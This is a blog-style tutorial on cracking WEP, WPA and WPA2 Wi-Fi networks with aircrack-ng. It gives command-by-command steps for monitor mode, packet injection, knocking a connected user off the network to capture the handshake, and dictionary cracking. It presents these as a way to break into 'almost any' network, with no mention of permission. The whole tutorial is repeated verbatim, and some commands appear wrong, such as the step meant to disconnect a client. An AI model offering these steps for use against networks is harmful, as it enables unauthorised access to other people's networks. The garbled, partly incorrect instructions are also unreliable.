Cracking WEP, WPA and WPA2 Encrypted Wifi Networks using Aircrack-ng.
In this tutorial I will demonstrate you how to crack almost any Encrypted Network that uses WEP, WPA and WPA2.
1. Before we start.
What we need:
Linux:
sudo apt-get install aircrack-ng airmon-ng airodump-ng aireplay-ng kismet
(Recommended Download for Linux Users – It auto configures the tools needed)
Backtrack:
NOTHING! Every is included by default in backtrack….
2. WEP Cracking.
WEP is very easy and fast to crack. Here are the steps:
1. Put your Wireless Interface into Monitor Mode:
airmon-ng start wlan0
(In this example our interface is ‘wlan0′ – To find out your wireless interface type: iwconfig scan or airmon-ng )
2. Get Info from the Available Networks:
airodump-ng mon0
(mon0 is the monitored wlan0 interface)
3. Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:
airodump-ng -c channel -w filetosave –bssid macaddrs mon0
(‘channel’ is the Channel Number) (‘filetosave’ is the file that airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the Network) —> All this info is provided by the command used in Step 2.
4. To boost the proccedure type on a new terminal:
aireplay-ng -1 0 -a bssid mon0
(‘bssid’ is the MAC Address of the Network)
5. When this command is done, capture packets by typing:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0
(‘bssid’ is the Networks MAC Address)
6. When the above command gets about 20.000 – 30.000 packets you are now able to crack the network by typing:
aircrack-ng filename.cap
(where instead of ‘filename’.cap you enter the file that aireplay-ng saved at your current directory – This file is named wep-x.cap –x is a number, starting from ’01′, then ’02′ etc….–) (Instead of the ‘wep-01.cap’ you can use the ‘wep*.cap’ as in the example to ‘Auto-Select’ the file)
7. When aircrack-ng finds the key it will display something like:
KEY FOUND! [ 12:34:56:78:90 ]
(In this example our key is ’1234567890′)
8. When Finished, make sure you put your wireless interface back to original Mode by typing:
airmon-ng stop wlan0
______________________________ _______________________
3. WPA – WPA2 Cracking
How it is Cracked:
WPA-WPA2 are a special case when it comes to Wireless Network Cracking. The method used to crack them is named ‘Handshake’. What should we do to get the Handshake is fooling a Computer connected to the network we will crack. Then we will use a dictionary to crack the Handshake and get the Key. So, this means that to crack these networks we need:
A huge dictionary / wordlist – The bigger, the Better. (You can find searching the web using terms like: ‘Large WPA-WPA2 Cracking Wordlist’)
A PC already connected to that network.
So, let’s go and crack that network:
1. Enter your wireless interface into monitor mode:
airmon-ng start wlan0
(List your interfaces by typing airmon-ng or iwlist scan)
2. Get the list of the networks available:
airodump-ng mon0
(‘mon0′ is the monitored interface)
3. Get info on a specific Network:
airodump-ng -c channel -w filename –bssid macaddrs mon0
(‘channel’ is the Network’s channel number) (‘filename’ is the name of the file that airodump-ng will save its data) (‘macaddrs’ is the Network’s MAC Address)
4. Note that under the STATION Tab there is a MAC address. This means that there is someone connected to that network and this is his PC’s MAC address. To get the handshake we will kick him off and he will automatically reconnect to the network.
So, to kick him of and get the handshake, type at a new terminal:
aireplay-ng -1 0 -a bssid mon0
(where ‘bssid’ you must type the Network‘s MAC Address)
5. When we successfully get the handshake, stop the proccess by hitting CTRL+C at the terminal that Airodump-ng is running. The handshake should be placed at your Home Folder.
To crack it type:
aircrack-ng -w dictionary /username/filename
(‘dictionary’ is the name/path of your dictionary) (‘username’ is your username – on Backtrack is ‘root’ by default) (‘filename’ is the captured WPA/WPA2 Handshake)
In this tutorial I will demonstrate you how to crack almost any Encrypted Network that uses WEP, WPA and WPA2.
1. Before we start.
What we need:
Linux:
sudo apt-get install aircrack-ng airmon-ng airodump-ng aireplay-ng kismet
(Recommended Download for Linux Users – It auto configures the tools needed)
Backtrack:
NOTHING! Every is included by default in backtrack….
2. WEP Cracking.
WEP is very easy and fast to crack. Here are the steps:
1. Put your Wireless Interface into Monitor Mode:
airmon-ng start wlan0
(In this example our interface is ‘wlan0′ – To find out your wireless interface type: iwconfig scan or airmon-ng )
2. Get Info from the Available Networks:
airodump-ng mon0
(mon0 is the monitored wlan0 interface)
3. Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:
airodump-ng -c channel -w filetosave –bssid macaddrs mon0
(‘channel’ is the Channel Number) (‘filetosave’ is the file that airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the Network) —> All this info is provided by the command used in Step 2.
4. To boost the proccedure type on a new terminal:
aireplay-ng -1 0 -a bssid mon0
(‘bssid’ is the MAC Address of the Network)
5. When this command is done, capture packets by typing:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0
(‘bssid’ is the Networks MAC Address)
6. When the above command gets about 20.000 – 30.000 packets you are now able to crack the network by typing:
aircrack-ng filename.cap
(where instead of ‘filename’.cap you enter the file that aireplay-ng saved at your current directory – This file is named wep-x.cap –x is a number, starting from ’01′, then ’02′ etc….–) (Instead of the ‘wep-01.cap’ you can use the ‘wep*.cap’ as in the example to ‘Auto-Select’ the file)
7. When aircrack-ng finds the key it will display something like:
KEY FOUND! [ 12:34:56:78:90 ]
(In this example our key is ’1234567890′)
8. When Finished, make sure you put your wireless interface back to original Mode by typing:
airmon-ng stop wlan0
______________________________
3. WPA – WPA2 Cracking
How it is Cracked:
WPA-WPA2 are a special case when it comes to Wireless Network Cracking. The method used to crack them is named ‘Handshake’. What should we do to get the Handshake is fooling a Computer connected to the network we will crack. Then we will use a dictionary to crack the Handshake and get the Key. So, this means that to crack these networks we need:
A huge dictionary / wordlist – The bigger, the Better. (You can find searching the web using terms like: ‘Large WPA-WPA2 Cracking Wordlist’)
A PC already connected to that network.
So, let’s go and crack that network:
1. Enter your wireless interface into monitor mode:
airmon-ng start wlan0
(List your interfaces by typing airmon-ng or iwlist scan)
2. Get the list of the networks available:
airodump-ng mon0
(‘mon0′ is the monitored interface)
3. Get info on a specific Network:
airodump-ng -c channel -w filename –bssid macaddrs mon0
(‘channel’ is the Network’s channel number) (‘filename’ is the name of the file that airodump-ng will save its data) (‘macaddrs’ is the Network’s MAC Address)
4. Note that under the STATION Tab there is a MAC address. This means that there is someone connected to that network and this is his PC’s MAC address. To get the handshake we will kick him off and he will automatically reconnect to the network.
So, to kick him of and get the handshake, type at a new terminal:
aireplay-ng -1 0 -a bssid mon0
(where ‘bssid’ you must type the Network‘s MAC Address)
5. When we successfully get the handshake, stop the proccess by hitting CTRL+C at the terminal that Airodump-ng is running. The handshake should be placed at your Home Folder.
To crack it type:
aircrack-ng -w dictionary /username/filename
(‘dictionary’ is the name/path of your dictionary) (‘username’ is your username – on Backtrack is ‘root’ by default) (‘filename’ is the captured WPA/WPA2 Handshake)
Post a Comment Blogger Facebook